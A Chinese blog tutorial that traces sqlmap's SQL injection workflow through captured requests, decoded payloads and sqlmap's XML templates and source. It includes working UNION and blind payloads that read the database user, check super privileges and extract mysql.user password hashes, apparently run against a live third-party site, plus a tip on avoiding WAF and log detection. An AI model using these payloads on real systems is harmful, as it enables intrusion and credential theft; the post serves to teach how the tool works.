聊一聊SQLMAP在进行SQL注入时的整个流程

很多小伙伴在发现或者判断出注入的时候，大多数选择就是直接上sqlmap，结果往往也不尽人意，于是就有想法来写写 sqlmap 从执行到判断注入，到底发生了什么?

本文就用我们看的见的角度来分析，看看sqlmap到底发送了什么payload，这些payload是怎么出来的，不深入代码层面。

测试环境：

sqlmap(1.3.6.58#dev)
BurpSuite
http://attack.com?1.php?id=1

测试方式

利用 sqlmap 的 proxy 参数，我们将代理设置为 8080 端口用 burpsuite 进行抓包。

sqlmap.py-u"http://attack.com?1.php?id=1"--proxy="http://127.0.0.1:8080"

(测试了很久好像本地搭建的环境无法抓包，所以就找了有注入点的网站，漏洞已上报给漏洞平台)

抓取到的包如下 ：

sqlmap 的准备工作

我们也观察到，sqlmap 默认发送的 User-Agent 是这样的。

User-Agent:sqlmap/1.3.6.58#dev(http://sqlmap.org)

所以为了避免被 waf 或者日志里面记录，我们一般可以添加一个 –random-agent 参数在后面。

首先我们的 sqlmap 会连续发送出很多数据包来检测目标网站是否稳定：

GET/xxxx.php?id=1HTTP/1.1
Host:www.xxxx.xxx
Accept:*/*
User-Agent:sqlmap/1.3.6.58#dev(http://sqlmap.org)
Connection:close
Cache-Control:no-cache

[INFO]testingconnectiontothetargetURL
[INFO]testingifthetargetURLcontentisstable
[INFO]targetURLcontentisstable

接下来会检测是否为 dynamic，和上面的请求包相比，sqlmap 修改了 id 后面的值。

GET/xxxx.php?id=2324HTTP/1.1
Host:www.xxx.xxx
Accept:*/*
User-Agent:sqlmap/1.3.6.58#dev(http://sqlmap.org)
Connection:close
Cache-Control:no-cache

[INFO]testingifGETparameter'id'isdynamic

看不懂这是什么骚操作，我们来看看源码里面怎么说 (sqlmap\lib\controller\checks.py)。

defcheckDynParam(place,parameter,value):
"""
ThisfunctionchecksiftheURLparameterisdynamic.Ifitis
dynamic,thecontentofthepagediffers,otherwisethe
dynamicitymightdependonanotherparameter.
"""

根据输出语句的关键词查找，我追踪到了这个 checkDynParam 函数，大概的作用就是修改我们现在获取到的参数值，看修改前后的页面返回是否相同(有的时候注入有多个参数，那么有些无关紧要的参数修改后页面是没有变化的)，若有变化(或者说这个参数是真实有效的)，sqlmap 才会走到下一步。

下一步的数据包和功能如下：

GET/xxxx.php?id=1%27.%29%2C%2C.%28.%29%22HTTP/1.1
Host:www.xxx.xxx
Accept:*/*
User-Agent:sqlmap/1.3.6.58#dev(http://sqlmap.org)
Connection:close
Cache-Control:no-cache

[INFO]heuristic(basic)testshowsthatGETparameter'id'mightbeinjectable(possibleDBMS:'MySQL')

我们将上面的 url 编码解码：

/xxxx.php?id=1%27.%29%2C%2C.%28.%29%22
/xxxx.php?id=1'.),,.(.)"

这几个字符串就能判断是 MySQL 数据库?又是什么骚操作，再看看源码吧 (sqlmap\lib\controller\ckecks.py)：

infoMsg+="(possibleDBMS:'%s')"%Format.getErrorParsedDBMSes()

找到了一条语句，跟踪这个 getErrorParsedDBMSes() 函数。

defgetErrorParsedDBMSes():
"""
ParsestheknowledgebasehtmlFplistandreturnitsvalues
formattedasahumanreadablestring.

@return:listofpossibleback-endDBMSbaseduponerrormessages
parsing.
@rtype:C{str}
"""

那么这个函数就是通过报错信息(就是上面的 payload) 来辨别数据库的类型，刚好我找的这个网站也是爆出了 MySQL 语句的错误，然后就通过正则 (sqlmap/data/xml/errors.xml) 识别出来啦，篇幅原因源码就不分析了。

sqlmap 的注入分析

itlooksliketheback-endDBMSis'MySQL'.Doyouwanttoskiptestpayloadssp
ecificforotherDBMSes?[Y/n]Y
fortheremainingtests,doyouwanttoincludealltestsfor'MySQL'extending
providedlevel(1)andrisk(1)values?[Y/n]Y

上面 sqlmap 已经得到了数据库的类型并且参数也是有效的，接下来往下走 sqlmap 就开始判断注入了(这里直接用-v3 参数显示 payload 更加的清晰)。

这一块也是大家最需要搞清楚的一部分，很多小伙伴看着感觉有注入，哎，上 sqlmap，然后基本上一片红，但是实际上，按照 sqlmap 对注入的分类，我们可以更加清晰的了解 sqlmap 到底做了什么，这些东西是从哪里出来。

首先要说一下，sqlmap 有一个 —technique 参数，在运行的整个过程中，也是按照这几类来检测的：

--technique=TECH..SQLinjectiontechniquestouse(default"BEUSTQ")
B:Boolean-basedblindSQLinjection（布尔型注入）
E:Error-basedSQLinjection（报错型注入）
U:UNIONquerySQLinjection（可联合查询注入）
S:StackedqueriesSQLinjection（可多语句查询注入）
T:Time-basedblindSQLinjection（基于时间延迟注入）
Q:inline_querySQLinjection(内联注入)

对这几种注入还不熟练于心的小伙伴们要好好补一下基础。

那么这些主要的注入语句，我们可以在 sqlmap/data/xml/queries.xml 中查看了解，总结的还是挺全面的，这里截取一部分出来。

<dbmsvalue="MySQL">
<castquery="CAST(%sASCHAR)"/>
<lengthquery="CHAR_LENGTH(%s)"/>
<isnullquery="IFNULL(%s,'')"/>
<delimiterquery=","/>
<limitquery="LIMIT%d,%d"/>
<limitregexpquery="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)"query2="\s+LIMIT\s+([\d]+)"/>
<limitgroupstartquery="1"/>
<limitgroupstopquery="2"/>
<limitstringquery="LIMIT"/>
<orderquery="ORDERBY%sASC"/>
<countquery="COUNT(%s)"/>
<commentquery="---"query2="/*"query3="#"/>
<substringquery="MID((%s),%d,%d)"/>
<concatenatequery="CONCAT(%s,%s)"/>
<casequery="SELECT(CASEWHEN(%s)THEN1ELSE0END)"/>
<hexquery="HEX(%s)"/>
<inferencequery="ORD(MID((%s),%d,1))>%d"/>
<bannerquery="VERSION()"/>
<current_userquery="CURRENT_USER()"/>
<current_dbquery="DATABASE()"/>
<hostnamequery="@@HOSTNAME"/>
......
......
......

对于每种类型的注入语句需要如何组合，在 sqlmap/data/xml/payloads 下有六个文件，里面主要是定义了测试的名称(也就是我们控制台中输出的内容)、风险等级、一些 payload 的位置等，了解一下就行了。

<test>
<title>GenericUNIONquery([CHAR])-[COLSTART]to[COLSTOP]columns(custom)</title>
<stype>6</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
<response>
<union/>
</response>
</test>

同目录下还有一个 boundaries.xml 文件，里面主要是定义了一些闭合的符号，比方说我们注入点需要闭合，添加单引号、双引号、括号等一系列的组合方式，就是从这个文件当中提取出来的。

<boundary>
<level>3</level>
<clause>1</clause>
<where>1,2</where>
<ptype>3</ptype>
<prefix>'))</prefix>
<suffix>AND(('[RANDSTR]'LIKE'[RANDSTR]</suffix>
</boundary>

所以梳理一下思路，我们最终会发送给目标服务器的 payload，首先是需要闭合的 (boundaries.xml)，然后从对应的注入类型的各种测试模板中提取相应的参数(比如：boolean_blind.xml)，然后在 queries.xml 中取出相应的表达式，***通过 tamper 的渲染，输出我们最终的 payload，也就是我们的 -v3 参数。

sqlmap 的一些参数

我们主要分析以下两个命令：

--is-dba
--passwords

命令主要是判断 mysql 用户的一些信息，当我们发现注入可以利用的时候，下一步就是要看当前用户的权限看能有什么的操作了。

1. 判断是否是 dba 权限

sqlmap 一共发了两个请求包：

GET/xxxx.php?id=-2478%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280xxxxxxx%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x7176786b71%29%2CNULL%2CNULL--%20HZdPHTTP/1.1
Host:www.xxxx.xxx
Accept:*/*
User-Agent:sqlmap/1.3.6.58#dev(http://sqlmap.org)
Connection:close
Cache-Control:no-cache


GET/xxxx.php?id=-6628%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCONCAT%280x7178787871%2C%28CASE%20WHEN%20%28%28SELECT%20super_priv%20FROM%20mysql.user%20WHERE%20user%3D0xxxxxxxx%20LIMIT%200%2C1%29%3D0x59%29%20THEN%201%20ELSE%200%20END%29%2C0x7170627071%29--%20mOPVHTTP/1.1
Host:www.xxxx.xxx
Accept:*/*
User-Agent:sqlmap/1.3.6.58#dev(http://sqlmap.org)
Connection:close
Cache-Control:no-cache

将 payload 解码：

/xxxx.php?id=-2478UNIONALLSELECTNULL,CONCAT(0x71766a6271,IFNULL(CAST(CURRENT_USER()ASCHAR),0x20),0xxxxx),NULL,NULL--HZdP

/xxxx.php?id=-6628UNIONALLSELECTNULL,NULL,NULL,CONCAT(0x7178787871,(CASEWHEN((SELECTsuper_privFROMmysql.userWHEREuser=0xxxxxLIMIT0,1)=0x59)THEN1ELSE0END),0x7170627071)--mOPV

我们直接在 mysql 控制台下执行命令：

***个命令返回了用户名， 0x71766a6271 解码为 qvjbq，那么这一步我们可以提取出用户名了。

第二个命令返回了 1 ，我们将查询命令提取出来：

SELECTsuper_privFROMmysql.userWHEREuser=0xxxxxLIMIT0,1

在 mysql 数据库下的 user 表中查询 super_priv (超级权限)的值：

返回了 Y，所以我们判断是否为 dba 的思路就是通过查看 mysql.user 下 super_priv 的值。

这个命令有一个坑，有的时候我们所注入的服务器上面并没有 mysql 这个数据库，所以用这个命令的前提是 mysql 这个数据库要存在。

2. 查询密码

抓的包：

GET/xxx.php?id=1%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28DISTINCT%28authentication_string%29%29%20AS%20CHAR%29%2C0x20%29%20FROM%20mysql.user%20WHERE%20user%3D0x64623833323331%29%2C1%2C1%29%29%3E48HTTP/1.1
Host:www.xxxx.xxx
Accept:*/*
User-Agent:sqlmap/1.3.6.58#dev(http://sqlmap.org)
Connection:close
Cache-Control:no-cache

解码：

/xxxx.php?id=1ANDORD(MID((SELECTIFNULL(CAST(COUNT(DISTINCT(authentication_string))ASCHAR),0x20)FROMmysql.userWHEREuser=0xxxxx),1,1))>48

这里有个很有趣的地方，我的 sqlmap 是 1.3.6 的版本，不知道之前的是不是，他是从 mysql.user 中获取 authentication_string 的值，但是很有趣的是，这个值只有在 mysql 版本 5.7 以上，password 才会变成 authentication_string，我们也可以从 queries.xml 中找到这条语句：

<passwords>
<inbandquery="SELECTuser,authentication_stringFROMmysql.user"condition="user"/>
<blindquery="SELECTDISTINCT(authentication_string)FROMmysql.userWHEREuser='%s'LIMIT%d,1"count="SELECTCOUNT(DISTINCT(authentication_string))FROMmysql.userWHEREuser='%s'"/>
</passwords>

发现默认就是这个 authentication_string，所以我们这里直接修改 queries.xml 中的语句，将查询的列明改成 password 再测试一下。

后面测试发现，我们在没有修改的情况下，sqlmap 也会跑出密码，而且查看 payload 之后，sqlmap 先是查了 authentication_string，然后查了 password：

看下源码，然后找到了( sqlmap/plugins/generic/users.py)：

values=inject.getValue(query.replace("authentication_string","password"),blind=False,time=False)

这里用 replace 将两个列明进行了替换，里面有个 ifel 的语句，要是***次没找到就会进行替换，这样我们的问题就解决掉啦，sqlmap 还是想的挺周全的哈哈。

总结

sqlmap 里面的内容实在是太多太多，想要摸索里面的内容需要花费大量的时间，当然收获也是成正比的，搞清楚sqlmap 的流程原理，对我们 sql 注入技术会有很大的提升。